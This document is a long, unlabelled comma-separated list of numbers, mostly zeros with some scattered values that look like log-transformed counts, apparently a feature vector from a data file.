0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.8903717578961645, 0.0, 0, 1.3862943611198906, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 3.4339872044851467, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0, 0.0, 9.406482647787449, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 3.295836866004329, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 2.995732273553991, 6.127701357652087, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.302585092994046, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 4.110873864173311, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 3.4965075614664802, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 3.4339872044851467, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.58351893845611, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0, 0.0, 1.3862943611198906, 5.442417710521793, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 1.6094379124341003, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 3.4965075614664802, 5.723585101952381, 0, 0, 3.800574088041945, 0.0, 4.518263445217986, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 3.295836866004329, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 4.969813299576001, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 5.545177444479562, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 4.7535901911063645, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6635616461296467, 0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 2.0794415416798357, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 4.174387269895637, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6375861597263857, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.430816798843313, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 4.532599493153256, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 